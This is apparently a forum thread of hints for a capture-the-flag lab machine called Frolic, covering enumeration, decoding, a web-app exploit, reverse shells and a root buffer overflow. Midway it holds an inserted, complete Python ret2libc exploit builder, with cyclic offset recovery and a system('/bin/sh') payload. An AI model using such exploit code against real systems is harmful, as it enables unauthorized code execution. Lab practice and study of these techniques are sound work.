Frolic

So I found the baup/ dir and I see what looks to be breadcrumbs to a lp/ that says not authorized. I'm trying to figure out how to dig into this but am unsure what direction to move in! Any help would be fabs!

Where Oh Where to use these credentials.

Hello, I have idk*********s and have enumerated the high HTTP port but found nothing yet. I mean, I found 4 dirs (one of them is loop) but nowhere to use the pass. I've also found another service (brazilian dance) but it doesn't seem to be the way.
What am I missing?

I've also enumerated subdirs for every dir I've mentioned before. I'm stuck now; I'd appreciate any hint or nudge you can give me.
Thank you!

Oh! Almost forgot: I also have a pair of creds, usr/pass, found in the b****p dir but nowhere to use them.
I'm completely lost.

Edit: Done user! Thank you @clmtn

Hi guys, I have found the two pairs of credentials + the “idk” password.

Have enumerated directories as much as I could, using both Gobuster and Dirb, used different wordlists (for both directories and files), and still can't find that login page for "ps" that everyone seems to find. I have found the "ps" directory but it just returns a 404. I have also tried to enumerate files and further directories from that one, with no success.

I keep running into those loop directories, which are recursive up to a certain point, but I have a feeling that is just a rabbit hole.

Would appreciate a PM on which direction I should go :frowning:

I successfully logged in to p**YS*S.

Now how do I get user? I can't determine the p**YS*S version.

What type of shell should I use here, i.e. bind or reverse?

What interface do I need to use, i.e. eth0 or tun0?

I used Metasploit but it starts the reverse handler and then shows "Exploit completed but no session was created".

Please help

@laxudope said:

I successfully logged in to p**YS*S.

Now how do I get user? I can't determine the p**YS*S version.

What type of shell should I use here, i.e. bind or reverse?

What interface do I need to use, i.e. eth0 or tun0?

I used Metasploit but it starts the reverse handler and then shows "Exploit completed but no session was created".

Please help

I googled p******S vulns and found a git repo with a useful script. :wink:

One should always google first, as a rule.

Good Luck!

This box is not Frolic at all. Regarding user, searchsploit p*****s will also help.

Took a few days, but finally popped this one. And although enjoyable (maybe not so much at the time), it shouldn't have been the first one I attempted.

Rooted :slight_smile: It was made difficult by removing gdb.

Thanks @clmtn for the help.

hint for r*p bof 52 in magic number

Anyone able to give me a hand for root? Messing with this BOF now and I've made some progress but am unsure where to go from here.

EDIT:
Nvm, rooted :stuck_out_tongue: Was my first BOF and I managed to get it done with no hints. Just lots of research.

Can anyone provide some hints? Have decoded the …/? and am now onto the second one but can't get it to anything useful.

I decoded .!? but not sure how to go about the next one. Can someone PM me with some hints?

Can someone give me some hints? I got one username and password from /baup and two logins, but it doesn't work. I know it has p****ms. Plz PM me. I didn't find anything in s.

@B1ngDa0 said:

Can someone give me some hints? I got one username and password from /baup and two logins, but it doesn't work. I know it has p****ms. Plz PM me. I didn't find anything in s.

Decode "!.?." and use it in p****ms for user.

@s0kIt said:
I decoded .!? but not sure how to go about the next one. Can someone PM me with some hints?

Look carefully in the JS, use that for login in n**x, then look for subdirs. You may find something useful in a "sub sub" directory.

I get weird behavior from meterpreter. Can anyone help please?

Rooted. I got user 3 months ago.
Left root for a while, but read a lot and learned what it takes to own it.
Was very good practice. Feel free to PM if you need help, no spoilers, I will give you the methods that led me to it.

I'm trying to exploit the r*p binary.
I've already read all of this that was posted here:
http://codearcana.com/posts/2013/05/28/introduction-to-return-oriented-programming-rop.html

https://www.shellblade.net/docs/ret2libc.pdf

Also watched the ippsec video.

I can't make it work, so I have a few questions:
1- Did you copy the binary to your own box to disassemble it? I think it's not necessary since I have the addr and offsets.
2- Did you have to build a new binary? I don't think it's necessary either.
3- My reverse shell is a bit limited and doesn't have all the output; can this be my problem? What did you do?

I'm a bit lost. The idea is really simple and I knew this technique before.

I hope there are no spoilers in this message; all the info posted here was mentioned before in the thread.
Any advice would be appreciated.

@epsequiel have a look at IPpsec October video :slight_smile:
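Since the posts above (the r*p overflow, ret2libc, gdb being absent on the box) keep circling the same two mechanical steps, here is an added example of the attacker-side tooling for them, written for this thread and not taken from the box, the ippsec video or any linked document. It shows (1) how a cyclic (de Bruijn) pattern lets you recover the overflow offset from whatever value ends up in EIP, which matters when you cannot single-step in gdb and only get the faulting address from a crash message or core, and (2) the classic 32-bit ret2libc frame layout [padding][&system][&exit][&"/bin/sh"], with a bad-character check so a NUL or newline in an address does not silently truncate the payload. All addresses and offsets in the code are constructed placeholders; the real ones come from the target's libc (ldd, readelf -s / nm -D, strings -tx), and the binary is assumed to be 32-bit x86 without stack protection, as in the ret2libc paper linked above.

```python
"""Added example: offset recovery + 32-bit ret2libc payload builder (not the box's code)."""
import struct
from functools import lru_cache

# pwntools-style alphabet; with n = 4 every 4-byte window of the pattern is unique
ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def p32(value: int) -> bytes:
    """Pack a 32-bit little-endian value, the width of a saved EIP on x86."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def u32(data: bytes) -> int:
    """Unpack the first 4 bytes of `data` as a little-endian integer."""
    return struct.unpack("<I", data[:4])[0]


@lru_cache(maxsize=None)
def _de_bruijn(alphabet: bytes, n: int) -> bytes:
    """De Bruijn sequence B(k, n): every n-byte window occurs exactly once,
    so the bytes that land in EIP identify their own offset in the input."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
            return
        a[t] = a[t - p]
        db(t + 1, p)
        for j in range(a[t - p] + 1, k):
            a[t] = j
            db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in out)


def cyclic(length: int) -> bytes:
    """First `length` bytes of the pattern: the input you feed the binary to crash it."""
    return _de_bruijn(ALPHABET, 4)[:length]


def cyclic_find(eip: int) -> int:
    """Offset at which the 4 bytes now in EIP started in the pattern, or -1 if the
    value did not come from the pattern. EIP can be read from gdb if present, or
    from the kernel's segfault line (dmesg) / a core file when it is not."""
    return _de_bruijn(ALPHABET, 4).find(p32(eip))


def bad_chars_in(data: bytes, bad: bytes) -> list:
    """Bytes of `data` that the delivery channel would mangle (sorted, unique)."""
    return sorted(set(b for b in data if b in bad))


def ret2libc_payload(offset: int, libc_base: int, system_off: int, exit_off: int,
                     binsh_off: int, bad: bytes = b"\x00\n") -> bytes:
    """Classic x86 ret2libc frame written over the saved return address:
        [offset bytes of padding][&system][&exit][&"/bin/sh"]
    system() sees exit() as its return address and the "/bin/sh" pointer as its
    first argument, so the process exits cleanly when the shell is closed."""
    chain = p32(libc_base + system_off) + p32(libc_base + exit_off) + p32(libc_base + binsh_off)
    hit = bad_chars_in(chain, bad)
    if hit:
        raise ValueError("address bytes %s are in the bad-char set; they would truncate "
                         "the payload (NUL for argv/strcpy, newline for gets/fgets)"
                         % [hex(b) for b in hit])
    return b"A" * offset + chain


if __name__ == "__main__":
    # Constructed crash: pretend the saved EIP sat 60 bytes into the buffer, so the
    # crash reports the 4 pattern bytes at that position as the faulting address.
    crash_input = cyclic(200)
    faulting_eip = u32(crash_input[60:64])
    off = cyclic_find(faulting_eip)
    # Placeholder libc base and symbol offsets (NOT from the box): substitute the
    # values you read from the target's libc with ldd, readelf -s and strings -tx.
    payload = ret2libc_payload(off, 0xb7e19000, 0x3ada0, 0x2e9d0, 0x15ba0b)
    print("offset =", off, "payload length =", len(payload))
```

Feed `cyclic(N)` to the binary the same way the real payload will be delivered (argv or stdin), because the delivery channel decides which bytes are bad: an argv/strcpy path stops at the first NUL, a gets/fgets path at the first newline. If ASLR is on for the target, `libc_base` changes per run and has to be leaked or brute-forced; if it is off, `ldd` on the binary gives it directly.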

@laxudope said:

@B1ngDa0 said:

Can someone give me some hints? I got one username and password from /baup and two logins, but it doesn't work. I know it has p****ms. Plz PM me. I didn't find anything in s.

Decode "!.?." and use it in p****ms for user.

Sorry, I didn't find the "!.?."
Can you PM me and tell me more? Plz